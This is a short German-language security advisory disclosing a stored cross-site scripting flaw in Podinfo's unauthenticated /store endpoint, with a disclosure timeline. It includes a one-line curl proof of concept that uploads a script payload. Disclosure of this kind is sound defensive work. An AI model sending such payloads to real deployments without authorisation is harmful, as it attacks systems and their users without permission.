CVE-2025-70849: Stored XSS in Podinfo
Zusammenfassung
Eine Sicherheitslücke (CWE-79) wurde in Podinfo, einer Webanwendung zur Demonstration von Kubernetes Microservices, identifiziert. Die /store-Funktion ermöglicht es nicht authentifizierten Benutzern, beliebige HTML/JS-Inhalte hochzuladen, was zu Stored XSS führt.
Schwachstellendetails
- CVE ID: CVE-2025-70849
- Produkt: Podinfo
- Betroffener Endpunkt:
/store
- Schwachstellentyp: Stored Cross-Site Scripting (XSS)
- Betroffene Versionen:
<= 6.10.0
Proof of Concept (PoC)
- Senden Sie die schädliche Nutzlast:
curl -X POST https://<target>/store -H "Content-Type: application/text" -d '<html><script>alert("CVE-2025-70849")</script></html>'
- Greifen Sie auf den zurückgegebenen Hash zu: https:///store/
Zeitplan
- Entdeckung: Sep 2025
- Anbieter benachrichtigt: 25. OKT. 2025
- Antwort des Anbieters: Bestätigt; es wurde mitgeteilt, dass derzeit kein Zeitplan für einen Fix besteht.
- Öffentliche Offenlegung: Februar 2026
Haftungsausschluss
Diese Forschung dient ausschließlich Bildungszwecken.
Forscher :
Kazi Sabbir |
Shafayet Ahmed Alif
Schweregrad: Mittel 6.4